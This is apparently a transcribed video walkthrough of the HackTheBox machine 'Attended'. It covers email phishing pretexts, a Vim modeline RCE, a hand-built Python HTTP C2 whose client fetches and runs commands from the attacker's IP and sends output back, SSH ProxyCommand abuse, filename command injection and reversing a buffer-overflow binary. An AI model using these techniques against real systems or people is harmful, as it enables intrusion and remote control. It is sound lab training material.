What's going on YouTube? This is Ipsec. I'm doing Attended from HackTheBox, which was an insane Linux machine. Actually, not Linux, it's OpenBSD. But it starts off with a phishing exploit where you can send an email and get emails back. Through his messages, you find out he's opening attachments in VIM, and there's an RCE for VIM back in 2019 that you can use to get code execution. However, it's not that simple because you can't just get a rev shell back because there's a firewall that blocks non-RFC compliant connections. So you have to do a C2 over HTTP as HTTP gets are allowed. But since it's OpenBSD, it's hard to find an implant for it. We're going to get into a lot of talking about C2s and make our own for this box, which is pretty cool. And once you get a shell on this, you go up to the Freshness user by exploiting a cron job, and the Freshness user gives you a binary that is a buffer overflow through SSH Public Keys, and the binary itself has an insane ROP chain that I can't even explain right now. So let's just get in and be amazed. As always, we're going to begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it attended, and then the IP address, which is 10.10.10.221. This can take some time to run, so I've already ran it, but instead of viewing this unless, I did something I'm actually pretty proud of, and if we just go look at my tmux config, I have this bind key with capital C to send the keys to copy it into my clipboard. Because people say I just take too long to do notes. So instead of removing the notes from my video, I want to optimize it. So now we can cat nmap attended.output. I'm going to hit my special key, which is Control B, and then capital C, and magically it just goes into my clipboard. So now inside of Obsidian, I can just paste that in, and we have it already here. So a little handy command to just speed up copy and paste. There are only two ports open on this box, SSH on port 22 and SMTP on port 25. Oddly enough, the SSH isn't giving up the actual hostname. Its banner just says OpenSSH 8.0, which is a little bit unique for these HackTheBox machines. And on port 25, SMTP, it is telling us the hostname is attended.htb. We get a potential username, and it's running OpenSMTPD. And if we go down a little bit, we can see the help is saying, please contact bugs@openbsd.org. So we know that this box is running OpenBSD. So we can take notes there and just put what we want. So the user potential is Guly, the OS OpenBSD, and then finally the host name is attended.htb. So I'm going to go over into my host file, so v-etc host, and we're going to add an entry here, so 10.10.10.221 attended.htb, and then I'm going to do something a little bit unique that I haven't really done before, and I'm going to set up IPTables to show me whenever a box connects back to me. And you'll see why we do this shortly. It's not something I always set up, but thinking about it, it is something that could be good to do because it's going to show you whenever a machine connects back to you, so you may miss shells, and it'll also show you if people ever initiate a connection to your machine, which could mean you get detected on an engagement, or maybe someone's attacking your box. So it's just one of those cool things to have. So this is going to be an IPTables rule. It is going on the input, and I just want it on TCP. You could do TCP and UDP if you want. And then we're going to specify the state. So mstate --state new. And this is only going to show when a box connects to us initially. It's not going to log if I connect to a box and then it comes back to me, because that would be a established connection and things like that. So this only shows when the box initiates a connection to me. We're going to pipe it over to the log table, and then we're going to give it the log prefix of IPTables new-connection. So this is going to be how it shows up in the log, and then just like this. And we could also specify like I_0, so it only takes effect on the interface _0. So if I do sudo IPTables-L, we can see that rule here. And if I do a sudo grep for IPTables on var log messages, we don't have anything here yet. I wonder if I do a nc 10.10.14.2 on port 9001. I doubt it's going to show up because this goes through like localhost, and we specified _0. But we'll see if this gets formatted soon. So we do have a SMTP server. So looking at this SMTP, so I'm going to use a program called SWAKS to send mail. So we're going to do SWAKS and then to Guly at attended.htb. And the reason we do Guly is because the server says it's proudly set up by him. So I'm going to send it to him. And then we'll say ipsec at, it doesn't really matter where we go. Ipsec at attended.htb. We can say header and then subject vulnerability. And then in the body, I'm going to say, hey, check out a vulnerability because mail is insecure. I put it on a web server. So here I'm telling Guly that to see a vulnerability in his mail server, he should go to my link. So I'm going to link this to 10.10.14.2. And this is just like setting up pre-texting for something. Check out this vulnerability in your mail server. And the next thing we do is the server. So server 10.10.10.221. So I'm going to do sudo python 3-m http server on port 80. And then we'll send this message and wait about a minute. I'm going to pause the video because it's like watching grass grow. It's been well over a minute and he hasn't connected back to us, so we know Guly isn't clicking links. If we look at our log file, so sudo grep-i IPTables on var log messages, we can see there is a connection back to our computer that we just didn't accept because we weren't listening on the port. Here is the log prefix of IPTables new connection. We can see the source is 10.10.10.221. Destination is ourselves. We can see the TTL and things like that. But the main thing we're looking at is destination port, which was sent from this as a destination port of 25. So he's trying to connect to port 25 on our machine, which is the SMTP port. So what I'm going to do is stand up a web server because it looks like he's not a web server, a SMTP server, because it looks like he's trying to send us mail. And this is a really weird thing because it's generally not like how mail works. But if he's trying to send it to our IP address, let's let him. So python 3-m smtpd-n-c debugging server. And then we can listen on all interfaces, or we can just listen on the one we want. I generally opt for the one I want. And we're going to have to run this with sudo. And now we have a web server up. Actually, I'm going to do the web server in this pane, because if I do it here, I will be able to do Control-R and send the same exact message via SWAKS. And what we can do is send it twice, and I can press my magic key, Control-B and C, and it's going to send this right to the clipboard. So while we wait for him to, well, he already responded, but we can create a new message and say 10 emails. And we have the command output here. And if I want, I can copy the SWAKS. Oh God. There we go. And we can copy this. There we go. So looking at what he sent us, we do have something that says, let's see. It's from attended. Let's go to the very top. Message follows. So from attended to me, from Guly at attended.htb. Telling us, thanks for writing. He's busy working on an issue with Freshness, which could be a potential other user, and dodging my email from everyone but him. I'll get back in touch as soon as possible. So it looks like he's dodging emails from everyone but Freshness. So what we can do is use that SWAKS command again. And let's say instead of ipsec, it's going to be Freshness. And we still want to listen on our server. And we can send this. and waiting for the response back. Again, it can take a minute, so I'm just going to pause the video until it comes. So it's been like 45 seconds, which I think is the new minute, and the cron sent us another email. This time it's telling us we should send something. So he's saying, please double check your attachment. It looks like I forgot to attach anything. He's also telling us he's installed a basic Python 2 environment on the gateway so we can proof of concept quickly to test outbound traffic restrictions. It should stop any non-RFC compliant connection. And the other hint is he's a Vim power user and against proprietary email attachments. However, I'm going to still send him a docx. So I'm going to touch test.docx. Not going to put any content in here. I just want to see how he reacts to it. And we're going to do -- attach and then at test.docx. And I'm going to wait for him to email us back. I'm also going to copy this because in our notes, while it was broke, I ended up cleaning this up a little bit. So we have 10 emails. We have, well, 10 is my like organizational and then emails. And we have email 1. And then I'm going to do 11, email 2. And we can paste this. And all we have to do is tell or put something up here that says email 2. And if we look here, let's see. I have from IPsec, so I'm going to just say from Freshness. And we look back, it looks like he has responded. And this time he's saying he's sorry, but he can't read my attachment. Remember, he's against proprietary attachments. So this is a hint that we probably should not use docx files. I wonder if I can just copy this. Move file to make a copy, email to 1, sweet. So we can just quickly paste and say with docx attachment, email 3, like that. We can say, yeah, that's fine. So let's send him a Vim file, and looking at searchploit or exploit DB, and if we look at the Vim, if we do Vim, there is a exploit. Probably could do searchploit or in a box, it'd be a little bit quicker. Here we go. Vim 81365/neovim. It's 2019, so it's relatively recent, and we've got code execution. So let's take a look at this. It looks like we create a POC, POC.txt or something. This is what they open. And this is the context. And it will run it in, or run the command uname-a. So let's go over here. We can leave this SMTP server running and create vim.txt. I'm going to paste this. And it's just going to run uname-a. There's no way for us to get this output back. So we probably should make a request to us. So what I'm going to do is a ping. We can do ping 10.10.14.2. And what we should do is make sure it's -c for count. Yep. Because we don't want to do an indefinite ping. That would be very bad. Come on. -c1. There we go. So now we have this attachment, and we can say the attachment is vim.txt, and I'm going to do sudo tcp dump -i ton0 icmp, and I'm also going to do a -n, so we can run this, and we'll see if he ever pings us. This looks like it is me pinging the gateway, which I think is a script I have to get milliseconds here. It's not displaying, but that is not to this box. So let's wait for him to respond to our email and see if anything down here happens on TCP dump. And man, that is annoying. I got to disable whatever I have pinging like every 5 seconds, it looks like. So we have him now sending an email message, and we have a hit from 10.10.10.221. So what we could do is go to like a reverse shell for Python, but I'm not going to do that because, let's see. I think there was something he said. You need RFC compliant connections, which means it's a protocol filter on the firewall. And a reverse shell doesn't follow any RFC or standard protocol, so it gets dropped. But he does say Python 2 is here, so we can kind of just jump the gun and go for a Python 2 command. And what I'm going to do is take notes of what we just did. So copy, and we can say, let's see, make a copy. This will be email for Vim file. And we can say this from Freshness with text attachment. Okay, so we want to create the Vim, and let's see, cat vim.text. This is the exploit. We probably should do search exploit, but yeah. Let's just, where's edit? We'll do this to be 20, give us some breathing room. And go down here and say, let's see. We want to test if we can get a connection back to us. And again, I'm not going to test with a reverse shell because it just won't connect back to us and we just waste a few minutes of typing it out. So let's create what is called a web cradle. So in our Vim file, Vim, not test, is it vim.text? I'm opening a Vim POC in Vim. Thankfully, I'm updated. Let's see. Instead of ping, I'm going to run Python 2 because he says he's got this. And what we want to do is -c for command. And we're going to give a small thing that we can execute code with. So we're going to do from base64 import b64 decode. And then we'll do a exec. And in Python, you can execute Python code dynamically through either like eval or exec. Eval is expecting it just to be one line of Python. Exec can be multiple lines. So that's why I'm doing exec. And if you're confused, if we just do Python 3 exec print who am I, it's just going to print who am I because it's running this code. And this code prints who am I. So that's all we're doing. So exec, and then we can say b64 decode, and we need some base64. Before we do that, I just realized I missed one parenthesis. We have the exec here, and then b64 opening it, and I only had one to close base64. So I'm just going to put that there, and then we can create our shell. So let's do make dir C2. Eventually, we're going to turn this into a C2 discussion, but for now, we just want to import request and then do request.get HTTP 10.10.14.2 to make sure we can get to us. And let's see, we can Python 3-m HTTP server 80, run it with sudo Python 3 client.py. Okay, it gets back to us. So let's do base64-w0 on client.py. So now we have some base64 to execute. And we can go over here and put that in. So I'm going to move the web server down here because in this history, I have the SMTP debug server. And down here, we can launch the web server. And here we do SWAKS. And I'm going to wait about probably a minute because he's going to respond. We'll see text fly here. And then hopefully he'll make a request here. And if he does that, we can go into a talk about how to create a small C2 based upon HTTP requests. And it looks like it hasn't come back to us yet. So I'm going to pause the video until we, oh, nope, there we go. So talked long enough for him to do this. And we verified we have execution because 10.10.10.221 is making a GET request to us. So this is where we're going to go into C2s. And I think this section is going to be really cool. I'm excited to talk about it because C2s are really complex when most people think they're just super simple and just use C2 incorrectly or just inefficiently. So when most people think of C2, they think of a like web-based one where the client makes an HTTP or HTTPS request to find tasking, and then the server will either say there's no tasking or give it a command. So if the server says no tasking, the client sleeps for X seconds, and that's generally 30 seconds, and then you have a jitter, and all the jitter's there to do is randomize us some bit. So if you remember a few minutes ago, my TCP dump showed a ping every 5 seconds. That's predictable. You know that's some type of like machine doing it. It's not a person. So the jitter would just say, not every 30 seconds. Let's just pick a random time between 30 and 90 seconds to make that request. And the issue with doing this is if I sent a command right now, I have to now wait between 30 and 90 seconds to get a response back because the client sleeps and then it makes another request to get tasking. The server says go run IPconfig, client runs it and gives output. And then sleeps. So the disadvantage to this is it can be slow. You issue a command and you wait. You can change the timeout to low, but if you change it too low, then it becomes unstealthy because let's say we change it to every second. We have 5 clients. That's going to be 5 requests a second, which I think turns into 300 a minute or 18,000 an hour. And if anyone's looking at any log, DNS, web, etc., that's going to stick out because you just can't go to a minute in that log without seeing the C2 domain. And if you just look at like the number of DNS requests per day, this is going to be super high as well. So everything is going to show up. The way around this is pretty simple and really cool once you look at it. So this is the traditional, and we're going to do a quote advanced. And instead of the client sleeping, it's going to be the server sleeping. So I'm just going to paste this here. So we have the client makes an HTTP request to find tasking. The server has no tasks, but keeps the HTTP request open. So the client doesn't sleep. The server keeps it open. And then operator gives task and server sends to client, and client runs it, gives output, and makes a request immediately. So the downside to this is if anyone's looking at like statistics, even if it's HTTPS, you'll see like an HTTPS session open for like 28 seconds, but only 40 bytes was transferred. That's weird because that server is just responding super slow. So you have a lot of weird things with that. But the advantage is the client's not going to make many requests to the server. So in the volume of request, this is super low. And if you're interactively typing commands, the chance of you getting detected anyways is pretty high. And the time it takes someone to detect these abnormal HTTP requests is going to be higher than if you just spam something. So RC2 that we're going to create is going to be this advanced method so you can see it. To be slightly better organized, we're going to create more notes, which I know some people may not want. So notes2.txt to talk about the files we're going to make, because RC2 for organization isn't going to be just one big file. So we're going to have main.py, and that's purpose is going to be hold our command variable. And then it's going to start terminal and then start listener. And then we're going to have the terminal.py. And this is just going to take command and update main.cmd. And then we have a listener.py, which is just going to be a web server, and slash will hand out tasking. If no tasking, sleep. There we go. I want it on one line. And then slash output will print to std out. So that's essentially going to be what we do. So let's get rid of our notes and we can create main.py. So all we want to do is do cmd is equal to nothing. And then if name is equal to main, and we don't actually have to do this, but clean Python at all. So if this is the main, we want to do terminal stuff and web stuff. So let's create terminal.py, and we can do, what is it? From cmd import cmd, I think, like that. And we can say class terminal cmd and prompt is equal to this, and def for default, self args, and we can do main.cmd is equal to args. And we just have to import main. So let's go back into main and see if this works. So going to our terminal, all we want to do is terminal is equal to terminal. And then we want to do terminal.cmd loop. And we have to import it. So from terminal import star. So if we do Python 3 main, we have something. And I just want to change one thing. And this prompt, I want to put a space there. Okay. So now we have that. We have to create our web server now, which we called listener.py. So this is going to do import main, but before we import main, we have to import a few things. So from http.server, import http server and base http request handler, and then from socket server, import threading mix in and import threading. These libraries we're going to be using because Python's built-in web server isn't threaded, which means it only handles one request at a time, which in our case would be very bad because we're letting requests stay open. So in order to accept multiple requests at once, that's why we are doing this threading. So all we do is class threading simple server threading mix in HTTP server, and we just pass this, and we can do def of run, and HTTP is equal to threading simple server, and then what we want to listen on 10.10.14.2, and then on port 80. And this is just standard Python HTTP request code. It's got its built-in handler. If you do like Python-m simple HTTP server, that's essentially this. We're just customizing the code a little bit. So HTTP serve forever. Okay. So now we have a web server. And if we go to main right now, it's not going to work. So we can do our web stuff of what is it? We have to do import listener, and is it listener.run? Yeah. So we can say listener.run. It's not going to work because we're hanging right here. So if I Python 3, actually, let's just put a print here. Print starting web server. Okay. So if we run main with sudo, and didn't have typos in the code, it never hits that print statement. So what we have to do is put this terminal in a thread. So go into main and say from threading import star. And then we can say terminal thread is equal to thread target terminal.cmd loop, like that. and then terminal thread.start. So now this backgrounds this terminal command. And if we run this, man, I am just typoing all over the place. I should have noticed that was not highlighted. Already in use. Reset. Oh, we have a web server here. There we go. We see starting web server. And if I go here and curl 10.10.14.2, we get a request. So what we have to do now is handle the tasking. So let's go back into our listener code. And what we want to do is change this all up so we can hijack the get and eventually the log output info. So let's create a class called handler, and it's going to be base HTTP request handler. And then the do get is the function whenever this thing makes a get request. So we can just say self.send response 200, self.end headers, self.wfile.write, hello world. I think we need to encode this. So we'll do be hello world like that. And the next thing we do is go down here. Instead of base HTTP handler, we run our custom class. So let's try this code, see what happens. We make a curl. We're getting hello world. Awesome. So now the next step is to handle the output. So if we print self.path, I think. Actually, I'm just going to import pdb and pdb.set trace. So we go into debug here, and we run this code again. Now we're in pdb. I can say self.path is slash. If I continue, we can say curl /ipsec, and then I can do self.path again, and it's ipsec. So we can determine what page we're on. So I'm going to go back into my listener code, and we're going to say try, and if output in self.path handle output, and let's go accept none. And this is going to be if output is not there. So we can say while main.cmd is equal to nothing, sleep 0.25, so a quarter of a second. And I think that's good. Self.write, we can say main.cmd.encode. And here we can just say main.cmd is equal to nothing. So let's run this. Indented block line 12. If, whoops, we just need to put something there. Okay. So we're going to do a curl. Sleep is not defined. So from time import sleep. Run this. And now I'm going to curl. And we see the request came here, but the curl is staying open. If I do ls, it says ls and ends. And that's what I mean about the request staying open, is it just stays open until you say something. So the next annoying thing is the web server by default is printing the log info of who gets it. And we can easily remove that by just doing def log message self format ergs, and we just return here. So now we just silence the message. We could print anything we want to customize the log message, or if we just don't print anything, it's not going to log. So now when I run this, we have this, and I can say, please leave a comment. And as soon as I type this, that curl request will finish, and it says that. Awesome. So the next piece we have to do is the command portion. So if output happens. So we can say the request URL is going to be equal to URL parse on self.path. And here we'll have to import a few things. So from URL lib.parse, import URL parse unquote plus and parse QS. Unquote plus, if you just use unquote, it's not going, this is to like decode HTTP, a URL thing. And if I don't do the underscore plus, it's not going to decode pluses. So any space in the output is going to be a plus and just looks ugly. So that's why that is there. So a request URL is going to be URL parse self path. And then we're going to do the parameters. So request param is equal to parse QS, request URL.query. And then we can do for I in request param. And this variable is going to be in the client that we code. Essentially, the output is going to be Q equals CMD output. So Q, and then print I.strip. And the strip is going to not do line breaks. So let's see what this looks like. And before we do, actually, I think we can just hand jam it. So let's say curl on 10.10.14.2, it's waiting. I want to run echo, please subscribe. And then we got that. So the next thing that would happen is it would do a curl 10.10.14.2 slash, we called it output, Q equals please subscribe. And then this should report just please subscribe. Yep, we have it printing. Now it's printing on our line here. So I'm going to change that really quick. And before this for loop where we're printing output, I'm just going to print a blank line. And this is really bad code. This isn't it's more proof of concept so you understand it. So now I can curl output. We need to, let's see, if output in self.path, except, so we should 3 like this and return, I think. Let's see. Because what was happening is I did this please subscribe and it was hanging because it didn't have a command. So now we fix that. All about fixing the bugs. So let's see. That looks fine. We have to go back to our client, and right now it's just request.get, very bare bone. So if we want to execute commands, we have to import a library to do that. I'm just going to do the OS library. And then I'm also going to import a sleep here, and you'll see why we do that in a second. And then after the imports, we're going to do a infinite loop. So this is why we do a sleep. Because if the server isn't running, we don't want to peg the CPU. So we're just going to sleep 1/4 of a second here. It's not going to be noticeable by running commands, but if this wasn't here and the server just didn't respond, we could just do an infinite number of requests and peg the CPU, which would be very bad. So we want to do R is equal to request.get on this IP. And then we can say output is going to equal os.p open r.text. This is going to be whatever the server sends back. And then we just want to execute it like that. And then we're going to say the payload is equal to Q, which is our parameter, output, which is the data. And we're going to do request.get HTTP 10.10.14.2/output, and params is equal to payload. Now, in a perfect world where I wasn't dealing with a super strict firewall, all the output would go into a post, because doing it this way, putting all the parameters in the URL, I forget what the length limit is, but you run into it eventually. If it was a post, we could have bigger requests, but the firewall is blocking post, and it's just not fun to troubleshoot a firewall while recording. So taking that as the hindsight. So we have the client. Let's try running our web server. And then Python 3, we're going to go into C2, client.py. We don't have payload equals, so v client.py, payload equals that, run it. And if I do a who am I, we get something to stand it out, but we got IPSec. If we do lsla, we have output of that as well. So it looks like our command is working as expected. Awesome. So yeah, I guess we can send this over into the email. So I'm going to spin up main.py. We're going to do a base64-w0 on client.py to grab this base64 one-liner. And then we're going to add that into vim.text. Vim.text. And we'll edit this base64 to put our new web cradle in. So now, when I send this with SWAKS, and he comes back to me, we should get a hit back on this web server. So, oh shoot, PDB. Yeah, SMTP debug. Forgot about that one. Let's just run this again just in case that minute passed. So I'm waiting for output here of him replying to the email. So he has now replied to the email, and I didn't have anything to show me if a client connects this C2, but we can just run who am I, and we get Guly. Awesome. Whenever I hit enter, it's doing the previous command. So that's just an annoying thing inside of the CMD library. Instead of fixing that, I'm just not going to worry about it. I'm going to do lsla, and we can get a list of files on this. Awesome. If we look at gchecker.py, if I do a cat there, maybe it's too big to be printed. Who am I? We're still connected, so we see Guly. I'm going to go into temp, lsla, and since I'm not using like a PTY thing, every command is a new session, unfortunately, so CD and stuff don't work. So I'm just going to do lsla on temp. And we can see there is a .config.swap, and that file is pretty big. If I do strings on .config.swap, and we have to go into temp, we can potentially get the output of this. Let's see. strings./tmp/.config.swap. There we go. I don't know why I needed the / there, but we have this. And it looks like a SSH config. So I'm going to copy this, go over to Obsidian, 25, need C2 notes, and then 30, we need to Guly. So If we go back to our emails, let's see, email 4 Vim file. He's saying if everything is fine, you will find a config file within minutes in the home shared folder. And he'll test it as soon as possible. So looking at this, if we look, the configs that probably go into that are going to be SSH configs because it's backwards, but host is equal to stir, which is part of an SSH config, user freshness, control master, things like that. So one of the other features of SSH commands or SSH configs is a proxy command. And the purpose of proxy command is to like proxy command through a jump host. So if we search proxy command SSH, and let's see, what is this? Proxy jump. So imagine, let's see, proxy, come on. There we go. Proxy command. So what the proxy command is going to do is SSH into remote host, and then through that remote host, run this command. So we can abuse this proxy command by just running a reverse shell, or the same C2 we're using currently. So we're going to create a config. So let's go, let's see if we can do, let's do pwd. Who am I? Guly, pwd, home Guly. Okay. Let's try echo hoster to, we'll call this ipsec.config. And then let's cat ipsec.config. And we see just hoster is there. So I'm going to echo proxy command. And we want to grab our Vim file. So cat vim.text. And the proxy command is going to be this Python string. So upon running SSH, it's going to run this code. So if we proxy command that, and I screwed that up, so I'm going to redo this. And we want to, let's see, probably put this in quotes. So echo, we need to put 2 spaces, and we can grab everything up to here. And 2 spaces because the config file, you do host stir, and then everything below it is a space. So escape this quote. Oh man. Let's see, this, yeah. And then escape the next quote. Okay. And then we end the double quotes. And we send this to ipsec.config. If we cat ipsec.config, we have this. And there's actually spaces here. I bet if we xxd, if xxd's here, it would work. But because of our unquote, it's stripping those spaces. So if we look for proxy command here, we do have 2 spaces. And this is a line break. So we do have 2 spaces there. Now, the next thing we have to do is run date because I don't want to run this in the same minute. So I'm going to copy ipsec.config to home shared ipsec.config. And we're going to give this some time to run. Guly, exit, close our web shell, give it like 5 seconds. And we're going to start this back up. And the proxy command finished and then came back to us as Freshness. So the reason why I had to kill it and restart the web shell is so Guly died and Freshness began. If I didn't do that, I have no way to switch sessions. And I'll leave that up to a coding challenge to you to kind of improve how the C2 works if you want to use it. But right now we have no such thing as sessions. But we look at this, we are Freshness. If we do lsla here, We do have an SSH directory that we can write to, so I'm going to go into .ssh, and if we had looked at Guly, we actually did not have that ability to write in here. So with this SSH access, I'm going to drop our key so we can get out of using this ghetto C2 thing. So SSH-keygen-f, I'm going to call it Freshness, and then cat freshness.pub, and we're going to grab this, and we will echo this into .ssh/authorized keys. And now if I chmod 600 the private key, sh-i freshness at 10.10.10.221, is it gonna let me in? No. What? Let's cat.sh authorized keys. It doesn't look like it added. That's weird. I did terminate. Try this again. Okay, now I did this and we have ipsec at parrot here. Okay, let's try this again. And I can log in as Freshness via SSH. So this is a good save point to get off of this C2. So let's clean this up and hope you enjoyed that. And we can begin enumerating this directory. And two things stick out. The first one being this fchecker.py, because it's a Python script. So what's this doing in the home directory? And we also have this AuthKeys directory. We know it's a directory from this. And the weird thing is its timestamp is off, like June 28th and November 16th. So there's like a 5-month gap between these two things. So it looks like it took the author a while to create this box. So he had an idea of the box and changed things up, but timestamps are always interesting to look at. Also, we do have user.txt in 2019, and this is kind of like a meta thing with HackTheBox machines. This tells me it's in a VM because the flag rotation, when machines boot up, they should get a new user.txt and root.txt, but that process doesn't work on VMs within machines based upon the previous machines that have released. So this is kind of like a meta thing to be like, oh, I'm probably in a VM because this is an old flag. Also, the flag is just before fchecker.py, which is when this box probably was initially created. So let's take a look at fchecker.py, and then we will look at November 16th. And wait, what? Yeah, I'm surprised it doesn't show the year of 2020. Yeah, that directory is just weird. I'm going to run stat on it real quick. Sorry, I just got nerd sniped. December 15th, 2020. So I'm guessing this is modified date of December 15th and created in November. Yeah, okay. I'm not sure why that doesn't have the year, but let's get back to analyzing fchecker.py because it's a Python script, should be easy to look at. So we have the path being set to home shared, and this is the path in the email, and also we already dropped the config file. So I'm guessing right off the bat, this is going to be what we use to get code execution. Then we have command user bin ssh-l for user freshness -F. I don't know exactly what this is, but it's an argument in 127.0.0.1. So I'm going to guess -f means use this SSH config. We're doing a loop in os.walk.path. And let's see, here's C file. So for every file inside of home shared, it's going to do command %c file, and this %c file is going to place the config here. So this is definitely config. And then it's doing a p equals subprocess.popen on C. So it's going to run this SSH with the config we dropped. And then after like 0.2 seconds, it's going to delete the config. So that is this script. It's how we got code execution on the box, and eyeballing it, there is a fun command injection vulnerability here. We don't have any escaping around this. So if you created a file with like test semicolon command here, so like ping 10.10.14.2, it would probably ping us. Let's see, tcp dump -i ton 0 icmp. I've actually done this, so let's see. We can touch that, and then let's move this file into home shared. And I didn't do a -c. Let's see. We'll see if it does ping. It may not work, and there may be other things we have to do, but it looks like there's a command injection here because there's no sanitization. And actually, let's put another semicolon. So what happened was I put a semicolon here and did ping 10.10.14.2 space 127.0.0.1. So I'm putting that second semicolon in my touch. So it's going to terminate the ping, and then we can say echo space. There we go. So let's move this file. Move test ping echo space. Wow, that is an ugly file. But home shared. Let's see if this one works. Maybe it doesn't, but yeah, I'm assuming there's command injection there. We could play around with it more, but we already executed commands. So let's look at AuthKeys. So we have a note.txt and what looks like a binary that we can't execute. So if we tried to, we can't. I knew I couldn't execute it based upon the color. I think if it was executable, it would be maybe not. Because I don't see this fchecker.py as a different color, and we have execute because of the group. So maybe the color is not working on this shell, but let's look at note.txt. And oddly enough, don't have a ping yet, so I'd have to dig into that code more. But whenever I see like a popen command and no sanitization, chances are we can do something naughty. Let's see, on attended and on attended gateway. So this is going back to say, oh, the flag rotation thing didn't happen, so we are definitely in a VM. We got two different machines here. Enable AuthKeys command for SSHD, remove the source code. So on attended, source code has been removed, and use nobody. On attended gateway, they have enabled AuthKeys command for SSHD, remove the source code, but they have not stopped it from running as nobody, so chances are we're a privileged user if we get on that. So let's copy this AuthKeys binary to our box and try to execute it. So I'm just going to kill that SSH session, switch this SSH with a SCP, and we'll do AuthKeys /star into AuthKeys. And down here, wait, did I not run this TCP dump? I think we did get command injection, but I never hit enter on the TCP dump. And I didn't specify -C1, so we have a constant ping. Hold on a second. Let's do sh-i freshness, ps-ef, ps-aux, grep ping. Yeah, so we do have it. Wonder if we have less-s. I don't know how to get the rest of the command, but you can see the command injection certainly does work. I just didn't hit enter on TCP dump. It's the silly things. And I wonder if I just broke the machine because, no, it's a subprocess, so it runs as a fork or whatever. So everything should still work. But that's why you generally always put -c in your pings. So let's go back here and do SCP. Sorry for that side rant, but AuthKeys /star, AuthKeys. That should be fine. Make dir AuthKeys, copy it. And this is a BSD binary, and I've never had luck using Ghidra's decompiler with BSD. So I'm going to open up an IDA. let's see, IDA is actually installed in home, IDA, or home ipsec, IDA 64. Let's do OK. We can do new. And we want to open AuthKeys. And yes, 64-bit. And here we go. So we have a relatively small binary, it looks like. And if we look here, we have compare RCX 5. And actually, before going into this and IDA, let's go and install BSD so we can execute this program, because I don't think we can run a BSD program on Linux. So if we go cd AuthKeys chmod +x AuthKeys, oh, we can. I did not expect that. I'm baffled at this running because it's a BSD thing, and I did not expect it to be like cross-platform between BSD and Linux. It is doing segfaults, which I don't know if that is standard behavior. We can check that by doing SSH and then going into AuthKeys, and we can copy AuthKeys to, let's say, up one directory test, chmod +x test, and run this. Yeah, we don't get segfaults. And I think it also says evaluating key. And on a Linux machine, let's see, 1, 2, 3, 4, it never says that. So we're going to have to install OpenBSD because this is weird behavior. But we can still prove out that this 5 is going to be comparing registers or arguments. And if this compare goes, then it will not jump here. So if there's not 5 arguments, it's going to jump here, which is just a exit out. So we can look at this. We don't see the final call. I don't know why IDA isn't showing it. If we switch out of Graphio, I tried to make the text bigger and failed. But after this XOR, it's going to Syscall. And OXDF had pointed this out. Both me and him, like the day before doing this video, we spent like 4 hours playing with this binary to fully understand it. So even though this video is going to be relatively short, there's a lot of work that went into this buffer overflow, which is, it's a pretty cool one. So that's why that exits. Let's go back to start. So let's look at exactly what goes on here. So if we have 4 arguments, because remember the fifth or the very first one is the program name, it's going to move 4 into EAX, 1 into EDI, and then it's going to move this string. So we can look at what this string is, evaluating. So I can name this to evaluating. And if we go back to start, it's going to move evaluating into RSI. And then it's going to call this, which I'm going to guess based upon this, it's just doing syscall.write. So all this function does is going to be probably print RSI. So print RSI is what we're going to call that. Underscore RSI, there we go. So it's going to print what's in that RSI register. And then we're going to put 5 into CL, which is the lower bit register for RCX. I think it's lower bit. Anything assembly, don't hold me to, because I kind of make this up as I go. If we do CL register, maybe assembly registers talks into it, so we can see CL is part of ECX. So this is just like compiler optimization to reduce size or speed or whatever, but moves 5 into this, which is the counter register. And now we're going to loop through each register, or through each argument. So it's going to decrement from 5, so it's going to argument 4, which I don't know which argument it does first, but it's doing arguments 1 at a time. And if it's not 0, if RCX is not 0, it's going to go down here. If it is 0, it goes here. So we know RCX is going to be 4 right here. So it's going to go down here, and it's going to move RSI RBX into AL, and AL is part of EAX or RAX. I don't know exactly what it's doing. It's going to increment RBX, and I bet if we set a breakpoint here, we'd be seeing it loop through what we put in the argument. So we'll do that after we install BSD. So it's probably going to loop through each argument, and then it's going to compare what is there in RBX. So that's why we moved that into AL. Did I say RAX? BL. I don't know exactly the register. Again, don't quote me, but it's moving the argument into this register, and then it's going to increase by 1, so looping through each character until it gets to a null byte. And if it's not a null byte, it's going to go down here and go back to itself, increment by 1, go to the next character, check if it's a null byte. And if it is a null byte, it's going to go up here, decrement RCX, which goes to the next argument, and go through the process until RCX is equal to 0. And then once RCX is equal to 0, it's going to go to this function. We have 2 print RSIs. I don't know. Is that actually still going to do that? Yep. So it's going to print 2 things. I hate how it keeps resizing, but. And let's see, it's moving 4 into EAX and EDI. So I don't know exactly what this variable is. Going over, it says, sorry. It's not completed. So not completed. Let's go back here and see what else. Let's see. Feel like I am missing a piece of this program. Oh, we don't have this call. So it's calling this function. And if we look at this function, it is somewhat bigger. And it's doing another loop. And let's see what is here. I don't know what these functions are. Looking at it, it's doing a call and jump. What is this? Call and jump. So don't know exactly what those are. But we see another string here. And looking at the string, we have A, B, C, D, E, F, G, all the way to Z, and then lowercase, and then numbers and plus slash. So this is going to be some type of base 64 encoding, most likely, whenever you see this character set. Or at least that's what sticks out to me. It's giving you a complete character set to do some type of encoding. So I'm going to assume this is going to be a base 64 decode function. We can say this is base 64. And let's see. I'm trying to follow this logic. So it's going to go down here, move this in here. Then we go all the way up, go back down here. And it's going to move this string into RDI. And this string is actually going to be, I think, where the base 64 value lives. So I think they've hard-coded this. Question mark. So we'll come back to that when we can debug in step. And it's copying 300 hex into RSP. And this is where the actual overflow comes from. The limit they have is 300, and we can actually put more than 300 there. So that's where the overflow happens. I know, not explaining this super well. Binary exploitation is not my strong suite, so don't expect great explanations, but hopefully it's good, and that's what we kind of looked at in IDA. So let's go over to our BSD VM, and I'm going to show the install process of this. So let's go up to the top. I'm going to do File, New Virtual Machine, do Custom, Workstation, and I don't feel like showing all the files on my host OS. So I'm just going to hand jam it in. The ISO for BSD, at least the most current one on the website, was install69.iso. It's BSD version 6.9, I believe. So it's in my downloads directory. And we'll click next. BSD is not an option, so I'm just doing other. Free BSDs here, but BSD is not, so I'm going to leave it at other 64-bit. And we're going to call this OpenBSD. One processor is fine, 256 megs is fine. I like doing it on bridge networking. And then I'm just going to click next. 8 gigs is fine for disk space. Create this. And we should be booting up. And as long as I type the ISO correctly, we'll go into a install. Looks like we do. And I'm going to view, stretch guest, free stretch. So now that should be nice and big for you. So let's see, installation process, let's just do I for install, default keyboard layout, host name, I'm going to call it attended, just for kicks. Network, sure, DHCP, sure. Yep, it looks like it got a lease. Done. Password for root account is going to be password. Wants me to type it again. Start 